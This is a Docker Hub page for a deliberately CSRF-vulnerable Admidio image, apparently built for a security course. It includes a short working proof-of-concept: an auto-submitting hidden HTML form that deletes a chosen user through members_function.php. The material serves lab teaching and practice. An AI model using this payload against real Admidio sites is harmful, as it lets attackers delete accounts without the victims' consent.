Sign inSign up

patrickelser/csrf-admidio

By patrickelser

•Updated almost 3 years ago

A CSRF vulnerable Admidio

Image
0

190

patrickelser/csrf-admidio repository overview

This is a CSRF vulnerable version of admidio.
A known vulnerable page is /adm_program/modules/members/members_function.php, and a PoC for could be:
<html>
<body onload="javascript:document.forms[0].submit()">
<form
action="http://{site address}/adm_program/modules/members/members_function.php">
<input type="hidden" name="usr_id" value='{id of user to delete}' />
<input type="hidden" name="mode" value="3" />
</form>
</body>
</html>
Credit to Faiz Ahmed Zaidi for finding the vulnerability: https://www.exploit-db.com/exploits/42005⁠
For CSEC380

Tag summary

Content type

Image

Digest

sha256:11d616438…

Size

309.1 MB

Last updated

almost 3 years ago

docker pull patrickelser/csrf-admidio